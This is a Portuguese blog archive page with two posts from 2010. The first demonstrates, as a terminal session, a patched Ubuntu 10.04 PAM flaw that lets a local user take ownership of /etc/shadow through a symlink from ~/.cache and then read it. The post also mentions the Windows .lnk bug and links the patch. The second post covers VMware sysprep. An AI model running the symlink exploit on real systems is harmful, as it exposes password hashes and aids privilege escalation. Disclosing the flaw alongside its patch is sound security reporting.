Archive for julho 31st, 2010


Ubuntu PAM vulnerability

Filed Under: Hacking, Linux, Security by admin — Leave a comment
31 de julho de 2010

Semana passada surgiu um bug no Windows que afetava diretamente os links, isso mesmo!!  algum hacker podem usar um arquivo de atalho malicioso, identificado pela extensão “.lnk”, para automaticamente executar o malware. Até a data de Hoje, não há correção para a falha que afeta desde o Windows 2000 até as versões do Windows 7.

Alguns papers explicam como mitigar o ataque, um exemplo é o paper escrito pelo Didier stevens (http://blog.didierstevens.com/2010/07/20/mitigating-lnk-exploitation-with-srp/), mas como o tópico não fala diretamente disso, eu acabei linkando com esse assunto pois uma falha que surgiu a umas semanas atrás, que afeta o módulo do PAM no Ubuntu LTS utiliza os links para poder ser explorada. Já com um patch publicado é aconselhável aplica-lo, explorando a falha não é possível escalar privilégios diretamente, mas é possível ler o /etc/shadow, e dai em diante……… =D Vejam abaixo:

trash@trash-desktop:~$ id
uid=1000(trash) gid=1000(trash) grupos=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(trash)
trash@trash-desktop:~$ rm -rf .cache/
trash@trash-desktop:~$ ls -la /etc/shadow
-rw-r—– 1 root shadow 1289 2010-07-31 17:19 /etc/shadow
trash@trash-desktop:~$ ln -s /etc/shadow ~/.cache
trash@trash-desktop:~$ ssh localhost
The authenticity of host ‘localhost (::1)’ can’t be established.
RSA key fingerprint is 86:cb:81:06:41:72:c4:f5:0f:7d:56:7f:5e:82:72:26.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘localhost’ (RSA) to the list of known hosts.
trash@localhost’s password:
Linux trash-desktop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS
Welcome to Ubuntu!
* Documentation:  https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Jul 25 04:18:47 2010 from localhost
trash@trash-desktop:~$ ls -la /etc/shadow
-rw-r—– 1 trash trash 1289 2010-07-31 17:19 /etc/shadow
trash@trash-desktop:~$ tail /etc/shadow =)

Simples assim…

Patch: http://bazaar.launchpad.net/~ubuntu-branches/ubuntu/karmic/pam/karmic-updates/revision/58

Referência: http://www.ubuntu.com/usn/usn-959-1

[]‘s

Sergito

Tags: , ,
Comment

Clone\Deploy Vmware ESX + Sysprep

Filed Under: Artigo, Virtualização by admin — Leave a comment
31 de julho de 2010

Quando temos a necessidade de fazer um clone de uma máquina virtual ou fazer um deploy em máquinas windows, precisamos fazer todo aquele processo de sysprep na máquina clonada. O Sysprep atribui uma SID (identificação de segurança) única para cada computador de destino na primeira vez que o computador é reiniciado, configura o sistema operacional para executar o Bem-vindo ao Windows ou a Microinstalação na primeira vez em que o usuário reiniciar o computador. E foi pensando nisso que um amigo meu (Daniel Machado) criou um rápido artigo que facilita o processo de sysprep. Segue abaixo:

Quando clonamos uma maquina virtual ou quando fazemos o deploy de um template no VMware, o sysprep é necessário como em um ambiente físico.

Podemos executar o vCenter de três formas:

1)      Preparar uma imagem base com Sysprep;

2)      Executar o Sysprep a cada nova clonagem ou deploy;

3)      A MAIS FACIL: Solicitar ao vCenter que execute o Sysprep marcando esta opção:

Para habilitar esta opção é necessário ter os arquivos do Sysprep disponíveis no servidor vCenter (para win2003 e xp, Vista/2008 já tem o sysprep integrado em System32) e o VMware tools instalado na imagem de origem, caso contrario é apresentado o seguinte erro:

Para integrar os arquivos do sysprep ao vCenter é necessário seguir o artigo: http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1005593

[]‘s

Sergito

Tags: , , ,
Comment